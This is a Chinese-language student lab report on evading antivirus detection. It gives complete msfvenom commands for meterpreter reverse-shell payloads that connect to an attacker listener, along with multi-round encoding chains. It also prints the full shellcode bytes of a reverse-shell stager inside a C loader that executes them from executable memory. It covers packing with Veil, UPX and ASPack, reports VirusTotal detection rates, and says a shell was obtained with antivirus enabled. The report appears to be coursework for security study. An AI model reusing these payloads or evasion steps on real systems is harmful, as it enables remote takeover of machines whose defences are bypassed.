1.实验内容
掌握免杀原理,使用编码技术,加壳技术和对应的免杀工具编写免杀代码。
问题回答:
- 杀软是如何检测出恶意代码的?
回答:特征码检测,启发式分析,行为检测,沙箱技术等。 - 免杀是做什么?
回答:免杀是对恶意代码进行加工处理,使其能够绕过杀毒软件的检测机制,避免被识别和清除。 - 免杀的基本方法有哪些?
回答:修改文件特征,延迟执行,进程注入等。
2.实验过程
1.使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
(1)利用msf编码器生成多种免杀代码,并使用virustotal网站评价免杀效果。
- 生成exe文件,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f exe -o payload.exe,免杀率为29.58%。
![image]()
![image]()
- 使用多重编码,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload_10.exe
,免杀率为40.85%。
![image]()
![image]()
- 生成JAR文件,代码:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f jar -o payload.jar
,免杀率为45.31%。
![image]()
![image]()
- 生成PHP文件,代码:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f raw -o payload.php,免杀率为60.66%。
![image]()
![image]()
可以看出exe,jar,php三种文件格式免杀率逐渐上升,使用多重编码后免杀率也有所上升,可以推出:不常见的文件格式和多重编码能提高免杀率。
(2)使用Veil进行加壳,并评价免杀效果。
- 通过
sudo apt -y install veil,下载安装veil。
![屏幕截图 2025-10-27 083657]()
- 通过
usr/share/veil/config/setup.sh --force --silent,配置veil的环境。
![屏幕截图 2025-10-27 083852]()
- 生成免杀代码,并进行评价。
![image]()
![image]()
![image]()
免杀率为48.61%,相较于多重编码有一定提高。
(3)使用C语言+Shellcode编程。
- 生成原始shellcode,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f c
![image]()
- 创建C语言文件payload.c。
![image]()
- 进行交叉编译,并评价免杀率。
![image]()
![image]()
免杀率为56.94%,相较于veil加壳有进一步的提升。
(4)使用其他加壳技术对步骤(3)生成的免杀代码进一步处理。
- 使用UPX加壳。
![image]()
![image]()
免杀率为54.93%,同原代码几乎无区别,可以认为UPX加壳技术已被广泛标识。 - 使用ASPack加壳。
![image]()
![image]()
免杀率为56.34%,同原代码仍几乎无区别, 可以认为单凭加壳技术已不能带来免杀能力上的提升。
2.通过组合应用各种技术实现恶意代码免杀。
(1)使用多重编码生成基础payload。
- 生成原始shellcode,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f raw -o payload_raw.bin。 - 用Shikata Ga Nai进行十轮编码,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw -o payload_encoded1.bin。 - 用Shikata Ga Nai与fnstenv mov进行六轮复合编码,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -e x86/shikata_ga_nai -i 6 -e x86/fnstenv_mov -i 6 -f raw -o payload_encoded2.bin。 - 生成C格式的shellcode,代码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f c -o payload_c.c。
(2)使用C+Shellcode编程处理payload。
- 用vi创建C+Shellcode,代码如下:
点击查看代码
#include <windows.h>
#include <stdio.h>unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89"
"\xe5\x8b\x52\x0c\x8b\x52\x14\x31\xff\x8b\x72\x28\x0f\xb7"
"\x4a\x26\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
"\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01"
"\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x48\x18"
"\x8b\x58\x20\x01\xd3\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34"
"\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01"
"\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01"
"\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58"
"\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00"
"\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xd7\x84\x68\x02\x00"
"\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74"
"\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
"\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b"
"\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e"
"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5"; // 插入生成的shellcodeint main() {void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);memcpy(exec, shellcode, sizeof shellcode);((void(*)())exec)();return 0;
}
- 使用gcc编译,代码为:
i686-w64-mingw32-gcc payload.c -o payload_basic.exe -s -Os。
(3)进行UPX加壳处理,代码为:upx -9 payload_basic.exe -o payload_20232411.exe 。
(4)进行免杀测试。
免杀成功!
3.用另一电脑实测,在杀软开启的情况下,运行并回连。
- 杀软名称及版本:
![image]()
- 进行msf检查并运行免杀代码,成功获得shell。
![image]()
![image]()
3.问题及解决方案
- 问题1:配置veil的环境时,出现报错,具体如下:
![image]()
- 问题1解决方案:该报错指出veil缺少win32运行环境,启用多架构支持
sudo dpkg --add-architecture i386,安装win32sudo apt-get install wine32:i386即可。 - 问题2:下载veil依赖Veil-Framework时,由于连接github失败报错。
- 问题2解决方案:使用手机热点进行下载。
4.学习感悟、思考等
本次实验提高了我对免杀技术的基本认知,使我对免杀代码有了一个粗浅的认知,为我今后的学习生活打下基础。
)
-编写一个程序“Hello World!”)
